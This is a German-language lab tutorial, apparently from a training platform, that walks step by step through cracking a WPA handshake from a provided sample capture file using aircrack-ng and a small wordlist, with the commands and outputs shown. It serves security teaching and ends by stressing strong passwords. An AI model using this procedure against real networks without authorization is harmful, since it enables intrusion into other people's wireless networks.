Einleitung
In diesem Lab lernen Sie, wie Sie einen Wörterbuchangriff (Dictionary Attack) gegen einen WPA/WPA2-Handshake durchführen. Wenn sich ein Gerät mit einem WPA/WPA2-geschützten WLAN-Netzwerk verbindet, findet ein 4-Wege-Handshake zur Authentifizierung des Geräts statt. Durch das Abfangen dieses Handshakes ist es möglich, das Passwort des Netzwerks offline zu knacken.
Ein Wörterbuchangriff ist eine Methode, um in ein passwortgeschütztes System einzudringen, indem systematisch jedes Wort aus einer Liste (genannt Wörterbuch oder Wortliste) als Passwort eingegeben wird. Wir werden aircrack-ng, ein leistungsstarkes Werkzeug für die WLAN-Sicherheitsprüfung, verwenden, um diesen Angriff durchzuführen. Sie erhalten eine erfasste Handshake-Datei (.cap) und eine Wortliste, um ein reales Szenario zu simulieren.
Am Ende dieses Labs werden Sie in der Lage sein, aircrack-ng zu verwenden, um ein WLAN-Passwort aus einer erfassten Handshake-Datei zu finden.
Lokalisieren der erfassten Handshake-.cap-Datei
In diesem Schritt lokalisieren Sie die vorab erfasste WPA-Handshake-Datei. Für dieses Lab wurde eine Beispieldatei namens wpa_handshake.cap in Ihrem Verzeichnis ~/project abgelegt. Diese Datei enthält den Netzwerkverkehr, einschließlich des wesentlichen 4-Wege-Handshakes, der für den Angriff benötigt wird.
Zuerst listen wir die Dateien im aktuellen Verzeichnis auf, um zu bestätigen, dass die Erfassungsdatei vorhanden ist. Verwenden Sie den Befehl ls -l.
ls -l
Sie sollten die Datei wpa_handshake.cap zusammen mit anderen Dateien in der Ausgabe sehen.
total 8
-rw-r--r-- 1 labex labex 11 Mar 25 10:00 rockyou.txt
-rw-r--r-- 1 labex labex 985 Mar 25 10:00 wpa_handshake.cap
Nachdem Sie die Anwesenheit der Erfassungsdatei bestätigt haben, können Sie mit dem nächsten Schritt fortfahren.
Finden einer Wortlistendatei wie rockyou.txt
In diesem Schritt finden und inspizieren Sie die Wortlistendatei. Ein Wörterbuch oder eine Wortliste ist eine einfache Textdatei, die eine Liste potenzieller Passwörter enthält, eines pro Zeile. aircrack-ng verwendet diese Liste, um jedes Passwort gegen den erfassten Handshake zu testen.
Eine kleine Wortliste namens rockyou.txt wurde für Sie im Verzeichnis ~/project erstellt. Betrachten wir ihren Inhalt mit dem Befehl cat.
cat rockyou.txt
Die Ausgabe zeigt die in der Datei enthaltenen potenziellen Passwörter.
password
12345678
biscotte
qwerty
In einem realen Szenario können Wortlisten riesig sein und Millionen oder sogar Milliarden von Passwörtern enthalten. Für dieses Lab enthält unsere kleine Liste das richtige Passwort, was einen schnellen Erfolg des Angriffs ermöglicht.
Erstellen des aircrack-ng-Befehls mit der .cap-Datei
In diesem Schritt verwenden Sie aircrack-ng, um die Erfassungsdatei zu inspizieren. Bevor Sie den Angriff starten, ist es gute Praxis zu überprüfen, ob die .cap-Datei einen gültigen WPA-Handshake enthält. aircrack-ng kann dies für Sie tun.
Führen Sie aircrack-ng aus und übergeben Sie die Erfassungsdatei wpa_handshake.cap als Argument.
aircrack-ng wpa_handshake.cap
aircrack-ng analysiert die Datei und zeigt Informationen über die gefundenen Netzwerke an.
Opening wpa_handshake.cap
Read 13 packets.
## BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
Opening wpa_handshake.cap
Please specify a dictionary (option -w).
Achten Sie besonders auf die Zeile WPA (1 handshake). Dies bestätigt, dass ein vollständiger WPA-Handshake für das Netzwerk "teddy" erfolgreich erfasst wurde und in der Datei vorhanden ist. Dies ist die Bestätigung, die wir benötigen, um mit dem Wörterbuchangriff fortzufahren. Das Tool fordert Sie auch auf, ein Wörterbuch anzugeben, was Sie in den folgenden Schritten tun werden.
Angeben der Wortliste mit dem Parameter -w
In diesem Schritt lernen Sie, wie Sie mit dem Parameter -w eine Wortliste für den Angriff angeben. Dieser Parameter teilt aircrack-ng mit, welche Datei als Wörterbuch potenzieller Passwörter verwendet werden soll.
Die vollständige Befehlssyntax lautet aircrack-ng <capture_file> -w <wordlist_file>.
Um zu verstehen, wie es funktioniert, versuchen wir zunächst, den Befehl mit einer nicht vorhandenen Wortliste auszuführen. Dies hilft Ihnen zu sehen, wie aircrack-ng Fehler behandelt. Versuchen Sie, den Befehl mit nonexistent.txt als Wortliste auszuführen.
aircrack-ng wpa_handshake.cap -w nonexistent.txt
Sie erhalten eine Fehlermeldung, da die Datei nicht gefunden werden kann.
Opening wpa_handshake.cap
Read 13 packets.
## BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
Opening wpa_handshake.cap
The file 'nonexistent.txt' doesn't exist.
Please specify a dictionary (option -w).
Dies bestätigt, dass aircrack-ng eine gültige, vorhandene Datei für den Parameter -w benötigt. Im nächsten Schritt verwenden Sie die korrekte Wortlistendatei, um den Angriff auszuführen.
Ausführen des Angriffs und Analysieren der Ausgabe "KEY FOUND"
In diesem Schritt führen Sie den vollständigen Wörterbuchangriff mit der korrekten Wortliste aus und analysieren die Ausgabe, um den Schlüssel zu finden. Da Sie nun wissen, wie Sie die Erfassungsdatei und die Wortliste angeben, können Sie den Angriff starten.
Führen Sie den aircrack-ng-Befehl aus und geben Sie wpa_handshake.cap als Erfassungsdatei und rockyou.txt als Wortliste an.
aircrack-ng wpa_handshake.cap -w rockyou.txt
aircrack-ng wird nun gestartet. Es wird jedes Passwort aus rockyou.txt gegen den Handshake testen. Da unsere Wortliste klein ist und das korrekte Passwort enthält, wird der Vorgang sehr schnell ablaufen.
Opening wpa_handshake.cap
Read 13 packets.
## BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
Opening wpa_handshake.cap
[00:00:00] 3 keys tested (23.08 k/s)
KEY FOUND! [ biscotte ]
Master Key : ED A5 79 22 E5 5F 56 64 74 CB 89 98 44 6A 18 25
E0 E3 44 86 8A F3 89 84 55 4A D3 94 03 19 28 79
Transient Key : 6A 84 A9 58 52 2E 61 30 62 50 2B 88 46 1B 2A 8A
...
EAPOL HMAC : 4E 1A E7 74 52 86 C5 29 A3 43 54 B2 1B 2D 34 18
Die wichtigste Zeile in der Ausgabe ist KEY FOUND! [ biscotte ]. Dies zeigt an, dass der Angriff erfolgreich war. aircrack-ng hat die Passwörter aus der Wortliste getestet und festgestellt, dass biscotte das korrekte Passwort für das Netzwerk "teddy" ist.
Zusammenfassung
In diesem Lab haben Sie erfolgreich einen Wörterbuchangriff auf einen WPA-Handshake mit aircrack-ng durchgeführt.
Sie haben gelernt, wie Sie:
- Eine Erfassungsdatei (
.cap) und eine Wortliste lokalisieren und identifizieren. aircrack-ngverwenden, um eine Erfassungsdatei zu inspizieren und die Anwesenheit eines WPA-Handshakes zu bestätigen.- Den Parameter
-wverwenden, um eine Wortliste für den Angriff anzugeben. - Den Wörterbuchangriff ausführen und die Ergebnisse interpretieren, um den Netzwerkschlüssel zu finden.
Diese Übung demonstriert eine grundlegende Technik bei der Überprüfung der WLAN-Sicherheit und unterstreicht die Bedeutung der Verwendung starker, komplexer Passwörter, die nicht leicht durch Wörterbuchangriffe erraten werden können.
